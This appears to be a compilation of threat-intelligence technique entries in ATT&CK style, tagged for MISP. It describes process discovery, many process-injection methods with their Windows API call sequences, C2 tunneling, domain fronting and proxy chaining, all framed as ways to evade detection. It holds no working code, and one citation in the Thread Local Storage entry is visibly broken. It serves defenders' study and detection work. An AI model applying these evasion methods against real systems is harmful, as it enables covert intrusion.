Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://app.tidalcyber.com/technique/710ae610-0556-44e5-9de9-8be6159a23dd) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

In Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://app.tidalcyber.com/software/abae8f19-9497-4a71-82b6-ae6edd26ad98) utility via [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) or <code>Get-Process</code> via [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde). Information about processes can also be extracted from the output of [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) calls such as <code>CreateToolhelp32Snapshot</code>. In Mac and Linux, this is accomplished with the <code>ps</code> command. Adversaries may also opt to enumerate processes via /proc.

On network devices, [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands such as show processes can be used to display current running processes.<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup><sup>[[show_processes_cisco_cmd](https://app.tidalcyber.com/references/944e529b-5e8a-54a1-b205-71dcb7dd304f)]</sup>

The tag is: misp-galaxy:technique="Process Discovery"

Asynchronous Procedure Call

Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges. APC injection is a method of executing arbitrary code in the address space of a separate live process.

APC injection is commonly performed by attaching malicious code to the APC Queue <sup>[[Microsoft APC](https://app.tidalcyber.com/references/37f1ef6c-fc0e-4e47-85ab-20d53caba77e)]</sup> of a process’s thread. Queued APC functions are executed when the thread enters an alterable state.<sup>[[Microsoft APC](https://app.tidalcyber.com/references/37f1ef6c-fc0e-4e47-85ab-20d53caba77e)]</sup> A handle to an existing victim process is first created with native Windows API calls such as <code>OpenThread</code>. At this point <code>QueueUserAPC</code> can be used to invoke a function (such as <code>LoadLibrayA</code> pointing to a malicious DLL).

A variation of APC injection, dubbed "Early Bird injection", involves creating a suspended process in which malicious code can be written and executed before the process' entry point (and potentially subsequent anti-malware hooks) via an APC. <sup>[[CyberBit Early Bird Apr 2018](https://app.tidalcyber.com/references/8ae4ec67-518e-46dd-872c-7e2a9ca4ef13)]</sup> AtomBombing <sup>[[ENSIL AtomBombing Oct 2016](https://app.tidalcyber.com/references/9282dbab-391c-4ffd-ada9-1687413b686b)]</sup> is another variation that utilizes APCs to invoke malicious code previously written to the global atom table.<sup>[[Microsoft Atom Table](https://app.tidalcyber.com/references/a22636c8-8e39-4583-93ef-f0b7f0a218d8)]</sup>

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via APC injection may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:technique="Asynchronous Procedure Call"

Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process.

DLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as <code>VirtualAllocEx</code> and <code>WriteProcessMemory</code>, then invoked with <code>CreateRemoteThread</code> (which calls the <code>LoadLibrary</code> API responsible for loading the DLL). <sup>[[Elastic Process Injection July 2017](https://app.tidalcyber.com/references/02c9100d-27eb-4f2f-b302-adf890055546)]</sup>

Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of <code>LoadLibrary</code>).<sup>[[Elastic HuntingNMemory June 2017](https://app.tidalcyber.com/references/8cd58716-4ff1-4ba2-b980-32c52cf7dee8)]</sup><sup>[[Elastic Process Injection July 2017](https://app.tidalcyber.com/references/02c9100d-27eb-4f2f-b302-adf890055546)]</sup>

Another variation of this method, often referred to as Module Stomping/Overloading or DLL Hollowing, may be leveraged to conceal injected code within a process. This method involves loading a legitimate DLL into a remote process then manually overwriting the module’s <code>AddressOfEntryPoint</code> before starting a new thread in the target process.<sup>[[Module Stomping for Shellcode Injection](https://app.tidalcyber.com/references/0f9b58e2-2a81-4b79-aad6-b36a844cf1c6)]</sup> This variation allows attackers to hide malicious injected code by potentially backing its execution with a legitimate DLL file on disk.<sup>[[Hiding Malicious Code with Module Stomping](https://app.tidalcyber.com/references/88983d22-980d-4442-858a-3b70ec485b94)]</sup>

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:technique="Dynamic-link Library Injection"

Extra Window Memory Injection

Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.

Before creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data).<sup>[[Microsoft Window Classes](https://app.tidalcyber.com/references/cc620fcd-1f4a-4670-84b5-3f12c9b85053)]</sup> Registration of new windows classes can include a request for up to 40 bytes of EWM to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. <sup>[[Microsoft GetWindowLong function](https://app.tidalcyber.com/references/4366217a-2325-4056-ab68-f5f4d2a0703c)]</sup> <sup>[[Microsoft SetWindowLong function](https://app.tidalcyber.com/references/11755d06-a9df-4a19-a165-2995f25c4b12)]</sup>

Although small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process’s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process’s EWM.

Execution granted through EWM injection may allow access to both the target process’s memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as <code>WriteProcessMemory</code> and <code>CreateRemoteThread</code>.<sup>[[Elastic Process Injection July 2017](https://app.tidalcyber.com/references/02c9100d-27eb-4f2f-b302-adf890055546)]</sup> More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process. <sup>[[MalwareTech Power Loader Aug 2013](https://app.tidalcyber.com/references/9a9a6ca1-d7c5-4385-924b-cdeffd66602e)]</sup> <sup>[[WeLiveSecurity Gapz and Redyms Mar 2013](https://app.tidalcyber.com/references/b8d328b7-2eb3-4851-8d44-2e1bad7710c2)]</sup>

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via EWM injection may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:technique="Extra Window Memory Injection"

ListPlanting

Adversaries may abuse list-view controls to inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. ListPlanting is a method of executing arbitrary code in the address space of a separate live process. Code executed via ListPlanting may also evade detection from security products since the execution is masked under a legitimate process.

List-view controls are user interface windows used to display collections of items.<sup>[[Microsoft List View Controls](https://app.tidalcyber.com/references/7d6c6ba6-cda6-4f27-bfc8-af5b759305ed)]</sup> Information about an application’s list-view settings are stored within the process' memory in a <code>SysListView32</code> control.

ListPlanting (a form of message-passing "shatter attack") may be performed by copying code into the virtual address space of a process that uses a list-view control then using that code as a custom callback for sorting the listed items.<sup>[[Modexp Windows Process Injection](https://app.tidalcyber.com/references/1bf45166-bfce-450e-87d1-b1e3b19fdb62)]</sup> Adversaries must first copy code into the target process’ memory space, which can be performed various ways including by directly obtaining a handle to the <code>SysListView32</code> child of the victim process window (via Windows API calls such as <code>FindWindow</code> and/or <code>EnumWindows</code>) or other [Process Injection](https://app.tidalcyber.com/technique/7a6208ac-c75e-4e73-8969-0aaf6085cb6e) methods.

Some variations of ListPlanting may allocate memory in the target process but then use window messages to copy the payload, to avoid the use of the highly monitored <code>WriteProcessMemory</code> function. For example, an adversary can use the <code>PostMessage</code> and/or <code>SendMessage</code> API functions to send <code>LVM_SETITEMPOSITION</code> and <code>LVM_GETITEMPOSITION</code> messages, effectively copying a payload 2 bytes at a time to the allocated memory.<sup>[[ESET InvisiMole June 2020](https://app.tidalcyber.com/references/d10cfda8-8fd8-4ada-8c61-dba6065b0bac)]</sup>

Finally, the payload is triggered by sending the <code>LVM_SORTITEMS</code> message to the <code>SysListView32</code> child of the process window, with the payload within the newly allocated buffer passed and executed as the <code>ListView_SortItems</code> callback.

The tag is: misp-galaxy:technique="ListPlanting"

Portable Executable Injection

Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges. PE injection is a method of executing arbitrary code in the address space of a separate live process.

PE injection is commonly performed by copying code (perhaps without a file on disk) into the virtual address space of the target process before invoking it via a new thread. The write can be performed with native Windows API calls such as <code>VirtualAllocEx</code> and <code>WriteProcessMemory</code>, then invoked with <code>CreateRemoteThread</code> or additional code (ex: shellcode). The displacement of the injected code does introduce the additional requirement for functionality to remap memory references. <sup>[[Elastic Process Injection July 2017](https://app.tidalcyber.com/references/02c9100d-27eb-4f2f-b302-adf890055546)]</sup>

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via PE injection may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:technique="Portable Executable Injection"

Process Doppelgänging

Adversaries may inject malicious code into process via process doppelgänging in order to evade process-based defenses as well as possibly elevate privileges. Process doppelgänging is a method of executing arbitrary code in the address space of a separate live process.

Windows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. <sup>[[Microsoft TxF](https://app.tidalcyber.com/references/f7f2eecc-19e6-4d93-8a53-91afea2f242e)]</sup> To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened. <sup>[[Microsoft Basic TxF Concepts](https://app.tidalcyber.com/references/72798536-a7e3-43e2-84e3-b5b8b54f0bca)]</sup> To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction. <sup>[[Microsoft Where to use TxF](https://app.tidalcyber.com/references/f315072c-67cb-4166-aa18-8e92e00ef7e8)]</sup>

Although deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. <sup>[[BlackHat Process Doppelgänging Dec 2017](https://app.tidalcyber.com/references/b0752c3a-1777-4209-938d-5382de6a49f5)]</sup>

Adversaries may abuse TxF to a perform a file-less variation of [Process Injection](https://app.tidalcyber.com/technique/7a6208ac-c75e-4e73-8969-0aaf6085cb6e). Similar to [Process Hollowing](https://app.tidalcyber.com/technique/77100337-67a1-4520-b25a-3ddd72b0d5ac), process doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process doppelgänging’s use of TxF also avoids the use of highly-monitored API functions such as <code>NtUnmapViewOfSection</code>, <code>VirtualProtectEx</code>, and <code>SetThreadContext</code>. <sup>[[BlackHat Process Doppelgänging Dec 2017](https://app.tidalcyber.com/references/b0752c3a-1777-4209-938d-5382de6a49f5)]</sup>

Process Doppelgänging is implemented in 4 steps <sup>[[BlackHat Process Doppelgänging Dec 2017](https://app.tidalcyber.com/references/b0752c3a-1777-4209-938d-5382de6a49f5)]</sup>:

  • Transact – Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.

  • Load – Create a shared section of memory and load the malicious executable.

  • Rollback – Undo changes to original executable, effectively removing malicious code from the file system.

  • Animate – Create a process from the tainted section of memory and initiate execution.

This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process doppelgänging may evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:technique="Process Doppelgänging"

Process Hollowing

Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process.

Process hollowing is commonly performed by creating a process in a suspended state then unmapping/hollowing its memory, which can then be replaced with malicious code. A victim process can be created with native Windows API calls such as <code>CreateProcess</code>, which includes a flag to suspend the processes primary thread. At this point the process can be unmapped using APIs calls such as <code>ZwUnmapViewOfSection</code> or <code>NtUnmapViewOfSection</code> before being written to, realigned to the injected code, and resumed via <code>VirtualAllocEx</code>, <code>WriteProcessMemory</code>, <code>SetThreadContext</code>, then <code>ResumeThread</code> respectively.<sup>[[Leitch Hollowing](https://app.tidalcyber.com/references/8feb180a-bfad-42cb-b8ee-792c5088567a)]</sup><sup>[[Elastic Process Injection July 2017](https://app.tidalcyber.com/references/02c9100d-27eb-4f2f-b302-adf890055546)]</sup>

This is very similar to [Thread Local Storage](https://app.tidalcyber.com/technique/24e0b530-cca7-4c5c-83b2-97b83c716e42) but creates a new process rather than targeting an existing process. This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process hollowing may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:technique="Process Hollowing"

Proc Memory

Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Proc memory injection is a method of executing arbitrary code in the address space of a separate live process.

Proc memory injection involves enumerating the memory of a process via the /proc filesystem (<code>/proc/[pid]</code>) then crafting a return-oriented programming (ROP) payload with available gadgets/instructions. Each running process has its own directory, which includes memory mappings. Proc memory injection is commonly performed by overwriting the target processes’ stack using memory mappings provided by the /proc filesystem. This information can be used to enumerate offsets (including the stack) and gadgets (or instructions within the program that can be used to build a malicious payload) otherwise hidden by process memory protections such as address space layout randomization (ASLR). Once enumerated, the target processes’ memory map within <code>/proc/[pid]/maps</code> can be overwritten using dd.<sup>[[Uninformed Needle](https://app.tidalcyber.com/references/5ac2d917-756f-48d0-ab32-648b45a29083)]</sup><sup>[[GDS Linux Injection](https://app.tidalcyber.com/references/3e7f5991-25b4-43e9-9f0b-a5c668fb0657)]</sup><sup>[[DD Man](https://app.tidalcyber.com/references/f64bee0d-e37d-45d5-9968-58e622e89bfe)]</sup>

Other techniques such as [Dynamic Linker Hijacking](https://app.tidalcyber.com/technique/b0d884c3-cf87-4610-992d-4ec54c667759) may be used to populate a target process with more available gadgets. Similar to [Process Hollowing](https://app.tidalcyber.com/technique/77100337-67a1-4520-b25a-3ddd72b0d5ac), proc memory injection may target child processes (such as a backgrounded copy of sleep).<sup>[[GDS Linux Injection](https://app.tidalcyber.com/references/3e7f5991-25b4-43e9-9f0b-a5c668fb0657)]</sup>

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via proc memory injection may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:technique="Proc Memory"

Ptrace System Calls

Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process.

Ptrace system call injection involves attaching to and modifying a running process. The ptrace system call enables a debugging process to observe and control another process (and each individual thread), including changing memory and register values.<sup>[[PTRACE man](https://app.tidalcyber.com/references/fc5e63e7-090a-441b-8e34-9946e1840b49)]</sup> Ptrace system call injection is commonly performed by writing arbitrary code into a running process (ex: <code>malloc</code>) then invoking that memory with <code>PTRACE_SETREGS</code> to set the register containing the next instruction to execute. Ptrace system call injection can also be done with <code>PTRACE_POKETEXT</code>/<code>PTRACE_POKEDATA</code>, which copy data to a specific address in the target processes’ memory (ex: the current address of the next instruction). <sup>[[PTRACE man](https://app.tidalcyber.com/references/fc5e63e7-090a-441b-8e34-9946e1840b49)]</sup><sup>[[Medium Ptrace JUL 2018](https://app.tidalcyber.com/references/6dbfe4b5-9430-431b-927e-e8e775874cd9)]</sup>

Ptrace system call injection may not be possible targeting processes that are non-child processes and/or have higher-privileges.<sup>[[BH Linux Inject](https://app.tidalcyber.com/references/bdbb2a83-fc3b-439f-896a-75bffada4d51)]</sup>

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via ptrace system call injection may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:technique="Ptrace System Calls"

Thread Execution Hijacking

Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. Thread Execution Hijacking is a method of executing arbitrary code in the address space of a separate live process.

Thread Execution Hijacking is commonly performed by suspending an existing process then unmapping/hollowing its memory, which can then be replaced with malicious code or the path to a DLL. A handle to an existing victim process is first created with native Windows API calls such as <code>OpenThread</code>. At this point the process can be suspended then written to, realigned to the injected code, and resumed via <code>SuspendThread </code>, <code>VirtualAllocEx</code>, <code>WriteProcessMemory</code>, <code>SetThreadContext</code>, then <code>ResumeThread</code> respectively.<sup>[[Elastic Process Injection July 2017](https://app.tidalcyber.com/references/02c9100d-27eb-4f2f-b302-adf890055546)]</sup>

This is very similar to [Process Hollowing](https://app.tidalcyber.com/technique/77100337-67a1-4520-b25a-3ddd72b0d5ac) but targets an existing process rather than creating a process in a suspended state.

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via Thread Execution Hijacking may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:technique="Thread Execution Hijacking"

Thread Local Storage

Adversaries may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges. TLS callback injection is a method of executing arbitrary code in the address space of a separate live process.

TLS callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code’s legitimate entry point. TLS callbacks are normally used by the OS to setup and/or cleanup data used by threads. Manipulating TLS callbacks may be performed by allocating and writing to specific offsets within a process’ memory space using other [Process Injection](https://app.tidalcyber.com/technique/7a6208ac-c75e-4e73-8969-0aaf6085cb6e) techniques such as [Process Hollowing]([FireEye TLS Nov 2017(https://app.tidalcyber.com/references/9737055a-f583-448e-84d0-1d336c4da9a8)]</sup>

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via TLS callback injection may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:technique="Thread Local Storage"

VDSO Hijacking

Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (vdso) hijacking is a method of executing arbitrary code in the address space of a separate live process.

VDSO hijacking involves redirecting calls to dynamically linked shared libraries. Memory protections may prevent writing executable code to a process via [Ptrace System Calls](https://app.tidalcyber.com/technique/e200d4c9-2d9c-4303-a2de-86baae85c60f). However, an adversary may hijack the syscall interface code stubs mapped into a process from the vdso shared object to execute syscalls to open and map a malicious shared object. This code can then be invoked by redirecting the execution flow of the process via patched memory address references stored in a process' global offset table (which store absolute addresses of mapped library functions).<sup>[[ELF Injection May 2009](https://app.tidalcyber.com/references/3ca314d4-3fcf-4545-8ae9-4d8781d51295)]</sup><sup>[[Backtrace VDSO](https://app.tidalcyber.com/references/1c8fa804-6579-4e68-a0b3-d16e0bee5654)]</sup><sup>[[VDSO Aug 2005](https://app.tidalcyber.com/references/ae70f799-ebb6-4ffe-898e-945cb754c1cb)]</sup><sup>[[Syscall 2014](https://app.tidalcyber.com/references/4e8fe849-ab1a-4c51-b5eb-16fcd10e8bd0)]</sup>

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via VDSO hijacking may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:technique="VDSO Hijacking"

Process Injection

Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.

There are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific.

More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel.

The tag is: misp-galaxy:technique="Process Injection"

Protocol Tunneling

Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. Tunneling involves explicitly encapsulating a protocol within another. This behavior may conceal malicious traffic by blending in with existing traffic and/or provide an outer layer of encryption (similar to a VPN). Tunneling could also enable routing of network packets that would otherwise not reach their intended destination, such as SMB, RDP, or other traffic that would be filtered by network appliances or not routed over the Internet.

There are various means to encapsulate a protocol within another protocol. For example, adversaries may perform SSH tunneling (also known as SSH port forwarding), which involves forwarding arbitrary data over an encrypted SSH tunnel.<sup>[[SSH Tunneling](https://app.tidalcyber.com/references/13280f38-0f17-42d3-9f92-693f1da60ffa)]</sup>

[Protocol Tunneling](https://app.tidalcyber.com/technique/bd677092-d197-4230-b94a-438cb24260fd) may also be abused by adversaries during [Dynamic Resolution](https://app.tidalcyber.com/technique/987ad3da-9423-4fe0-a52b-b931c0b8b95f). Known as DNS over HTTPS (DoH), queries to resolve C2 infrastructure may be encapsulated within encrypted HTTPS packets.<sup>[[BleepingComp Godlua JUL19](https://app.tidalcyber.com/references/fd862d10-79bc-489d-a552-118014d01648)]</sup>

Adversaries may also leverage [Protocol Tunneling](https://app.tidalcyber.com/technique/bd677092-d197-4230-b94a-438cb24260fd) in conjunction with [Proxy](https://app.tidalcyber.com/technique/ba6a869a-c870-4be6-bc08-e078f0efdc3b) and/or [Protocol Impersonation](https://app.tidalcyber.com/technique/eb15320a-cd24-45b2-b23f-05ef8daf1039) to further conceal C2 communications and infrastructure.

The tag is: misp-galaxy:technique="Protocol Tunneling"

Domain Fronting

Adversaries may take advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. <sup>[[Fifield Blocking Resistent Communication through domain fronting 2015](https://app.tidalcyber.com/references/52671075-c425-40c7-a49a-b75e44a0c58a)]</sup> Domain fronting involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header. A variation of the the technique, "domainless" fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored).

For example, if domain-x and domain-y are customers of the same CDN, it is possible to place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear to be going to domain-x, however the CDN may route it to domain-y.

The tag is: misp-galaxy:technique="Domain Fronting"

External Proxy

Adversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://app.tidalcyber.com/software/b98d9fe7-9aa3-409a-bf5c-eadb01bac948), ZXProxy, and ZXPortMap. <sup>[[Trend Micro APT Attack Tools](https://app.tidalcyber.com/references/dac5cda3-97bc-4e38-b54f-554a75a18c5b)]</sup> Adversaries use these types of proxies to manage command and control communications, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths to avoid suspicion.

External connection proxies are used to mask the destination of C2 traffic and are typically implemented with port redirectors. Compromised systems outside of the victim environment may be used for these purposes, as well as purchased infrastructure such as cloud-based resources or virtual private servers. Proxies may be chosen based on the low likelihood that a connection to them from a compromised system would be investigated. Victim systems would communicate directly with the external proxy on the Internet and then the proxy would forward communications to the C2 server.

The tag is: misp-galaxy:technique="External Proxy"

Internal Proxy

Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://app.tidalcyber.com/software/b98d9fe7-9aa3-409a-bf5c-eadb01bac948), ZXProxy, and ZXPortMap. <sup>[[Trend Micro APT Attack Tools](https://app.tidalcyber.com/references/dac5cda3-97bc-4e38-b54f-554a75a18c5b)]</sup> Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment.

By using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems.

The tag is: misp-galaxy:technique="Internal Proxy"

Multi-hop Proxy

To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source. A particular variant of this behavior is to use onion routing networks, such as the publicly available TOR network. <sup>[[Onion Routing](https://app.tidalcyber.com/references/0667caad-39cd-469b-91c0-1210c09e6041)]</sup>

In the case of network infrastructure, particularly routers, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain within the Wide-Area Network (WAN) of the enterprise. By leveraging [Patch System Image](https://app.tidalcyber.com/technique/630a17c1-0176-4764-8f5c-a83f4f3e980f), adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This custom onion routing network will transport the encrypted C2 traffic through the compromised population, allowing adversaries to communicate with any device within the onion routing network. This method is dependent upon the [Network Boundary Bridging](https://app.tidalcyber.com/technique/091282d8-ef05-487f-93aa-445efaeed71b) method in order to allow the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s WAN. Protocols such as ICMP may be used as a transport.

The tag is: misp-galaxy:technique="Multi-hop Proxy"

Proxy

Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://app.tidalcyber.com/software/b98d9fe7-9aa3-409a-bf5c-eadb01bac948), ZXProxy, and ZXPortMap. <sup>[[Trend Micro APT Attack Tools](https://app.tidalcyber.com/references/dac5cda3-97bc-4e38-b54f-554a75a18c5b)]</sup> Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.

Adversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.

The tag is: misp-galaxy:technique="Proxy"

Query Registry

Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.

The Registry contains a significant amount of information about the operating system, configuration, software, and security.<sup>[[Wikipedia Windows Registry](https://app.tidalcyber.com/references/656f0ffd-33e0-40ef-bdf7-70758f855f18)]</sup> Information can easily be queried using the [Reg](https://app.tidalcyber.com/software/d796615c-fa3d-4afd-817a-1a3db8c73532) utility, though other means to access the Registry exist. Some of the information may help adversaries to further their operation within a network. Adversaries may use the information from [Query Registry](https://app.tidalcyber.com/technique/58722f84-b119-45a8-8e29-0065688015ee) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

The tag is: misp-galaxy:technique="Query Registry"

Reflective Code Loading

Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly within the memory of the process, vice creating a thread or process backed by a file path on disk. Reflectively loaded payloads may be compiled binaries, anonymous files (only present in RAM), or just snubs of fileless executable code (ex: position-independent shellcode).<sup>[[Introducing Donut](https://app.tidalcyber.com/references/8fd099c6-e002-44d0-8b7f-65f290a42c07)]</sup><sup>[[S1 Custom Shellcode Tool](https://app.tidalcyber.com/references/f49bfd00-48d5-4d84-a7b7-cb23fcdf861b)]</sup><sup>[[Stuart ELF Memory](https://app.tidalcyber.com/references/402745e1-a65a-4fa1-a86d-99b37221095c)]</sup><sup>[[00sec Droppers](https://app.tidalcyber.com/references/7569e79b-5a80-4f42-b467-8548cc9fc319)]</sup><sup>[[Mandiant BYOL](https://app.tidalcyber.com/references/445efe8b-659a-4023-afc7-aa7cd21ee5a1)]</sup>

Reflective code injection is very similar to [Process Injection](https://app.tidalcyber.com/technique/7a6208ac-c75e-4e73-8969-0aaf6085cb6e) except that the “injection” loads code into the processes’ own memory instead of that of a separate process. Reflective loading may evade process-based detections since the execution of the arbitrary code may be masked within a legitimate or otherwise benign process. Reflectively loading payloads directly into memory may also avoid creating files or other artifacts on disk, while also enabling malware to keep these payloads encrypted (or otherwise obfuscated) until execution.<sup>[[Stuart ELF Memory](https://app.tidalcyber.com/references/402745e1-a65a-4fa1-a86d-99b37221095c)]</sup><sup>[[00sec Droppers](https://app.tidalcyber.com/references/7569e79b-5a80-4f42-b467-8548cc9fc319)]</sup><sup>[[Intezer ACBackdoor](https://app.tidalcyber.com/references/e6cb833f-cf18-498b-a233-848853423412)]</sup><sup>[[S1 Old Rat New Tricks](https://app.tidalcyber.com/references/20ef3645-fb92-4e13-a5a8-99367869bcba)]</sup>

The tag is: misp-galaxy:technique="Reflective Code Loading"

Remote Access Software

An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as VNC, Team Viewer, AnyDesk, ScreenConnect, LogMein, AmmyyAdmin, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.<sup>[[Symantec Living off the Land](https://app.tidalcyber.com/references/4bad4659-f501-4eb6-b3ca-0359e3ba824e)]</sup><sup>[[CrowdStrike 2015 Global Threat Report](https://app.tidalcyber.com/references/50d467da-286b-45f3-8d5a-e9d8632f7bf1)]</sup><sup>[[CrySyS Blog TeamSpy](https://app.tidalcyber.com/references/f21ea3e2-7983-44d2-b78f-80d84bbc4f52)]</sup>

Remote access software may be installed and used post-compromise as an alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system.

Adversaries may similarly abuse response features included in EDR and other defensive tools that enable remote access.

